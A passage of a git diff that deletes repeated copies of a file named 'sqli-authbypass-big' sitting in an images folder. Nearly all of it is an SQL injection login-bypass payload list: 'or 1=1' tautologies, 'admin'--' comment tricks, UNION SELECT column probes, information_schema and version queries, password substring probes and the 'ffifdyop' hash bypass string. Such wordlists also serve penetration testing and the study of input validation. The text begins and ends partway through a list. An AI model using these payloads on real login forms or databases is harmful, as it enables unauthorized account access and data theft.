-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
